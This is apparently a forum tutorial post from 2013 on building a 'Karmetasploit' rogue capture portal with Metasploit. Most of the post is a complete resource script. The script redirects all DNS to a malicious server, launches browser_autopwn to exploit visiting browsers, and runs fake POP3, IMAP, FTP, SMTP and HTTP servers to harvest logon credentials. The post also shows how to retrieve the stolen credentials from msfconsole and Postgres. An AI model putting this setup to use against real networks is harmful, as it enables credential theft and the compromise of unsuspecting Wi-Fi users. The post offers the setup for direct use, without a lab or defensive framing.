Karmetasploit - metasploit capture traffic

Submitted by lenbal on Thu, 02/07/2013 - 22:40

This section describes howto start a metasploit capturing portal. It captures all DNS requests, redirects everything to a malicious web server fully loaded with exploits using the browser autopwn. It also captures logon credentials for several services (pop3, imap, ftp, smtp, http). Best used with the fake wifi AP tutorial:)

Clone Wifi access points

Create Wifi NAT

First you should create a startup script for metasploit in order to keep it simple.

nano /pentest/exploits/framework2/karma.rc

Put the followings in it to capture pop3, imap, ftp, smtp, http, dns and to start a malicious website with full of exploits. All browsing probes will be redirected to this site by autopwn:

use auxiliary/server/browser_autopwn
 
setg SRVHOST 10.0.0.1
setg SRVPORT 55550
setg URIPATH /ads
 
setg LHOST 10.0.0.1
setg LPORT 45000
 
run
 
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
 
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
 
use auxiliary/server/capture/ftp
set SRVPORT 21
run
 
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run
 
use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
 
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
 
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
 
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run
 
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run
 
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run
 
use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run
 
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run
 
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run

Save the file, and start msfconsole. I like to manually start msfconsole, and then "resource karma.rc". If I start with msfconsole -r karma.rc, sometimes the autopwn forgets to load itself:

msfconsole
resource karma.rc

The captured info can be seen in msfconsole with the follwoing commands

hosts
services
vulns
notes
info

The captured info can also be seen in postgres with the follwoing commands

sudo -s
su postgres
psql msf_database_name
select * from notes;

 

Links:

http://www.offensive-security.com/metasploit-unleashed/Attack_Analysis
http://resources.infosecinstitute.com/karmetasploit/